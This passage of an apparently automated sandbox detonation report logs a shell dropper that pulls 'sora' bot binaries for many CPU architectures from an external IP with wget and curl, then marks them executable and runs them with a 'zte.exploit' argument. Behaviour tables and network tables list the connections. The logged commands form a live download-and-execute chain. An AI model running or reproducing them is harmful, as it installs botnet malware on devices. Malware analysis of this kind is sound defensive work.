N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/cat N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh N/A

Processes

/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4f897d62da9643bba7f9ae58129ac207-systemd-timedated.service-3hI9pc]

/tmp/robben

[./robben zte.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 03:05

Reported

2024-10-18 03:08

Platform

debian9-mipsel-20240611-en

Max time kernel

29s

Max time network

30s

Command Line

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/cat N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh N/A

Processes

/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh

[/tmp/f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86]

/bin/cat

[cat sora.x86]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mips]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mips]

/bin/cat

[cat sora.mips]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.x86_64]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.x86_64]

/bin/cat

[cat sora.x86_64]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i468]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i468]

/bin/cat

[cat sora.i468]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.i686]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.i686]

/bin/cat

[cat sora.i686]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.mpsl]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.mpsl]

/bin/cat

[cat sora.mpsl]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm4]

/bin/cat

[cat sora.arm4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm5]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm5]

/bin/cat

[cat sora.arm5]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm6]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm6]

/bin/cat

[cat sora.arm6]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.arm7]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.arm7]

/bin/cat

[cat sora.arm7]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc]

/bin/cat

[cat sora.ppc]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.ppc440fp]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.ppc440fp]

/bin/cat

[cat sora.ppc440fp]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.m68k]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.m68k]

/bin/cat

[cat sora.m68k]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

/usr/bin/wget

[wget http://93.123.85.141/bins/sora.sh4]

/usr/bin/curl

[curl -O http://93.123.85.141/bins/sora.sh4]

/bin/cat

[cat sora.sh4]

/bin/chmod

[chmod +x f257b23d5b8d008fd9738742cd7b8c8c55e893f8d95d29aeffbe84bd0af2df70.sh robben systemd-private-4d4d908f319d4916bf9ee2a60ae2767c-systemd-timedated.service-AH9oIr]

/tmp/robben

[./robben zte.exploit]

Network

Country Destination Domain Proto
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp
NL 93.123.85.141:80 tcp

Files

N/A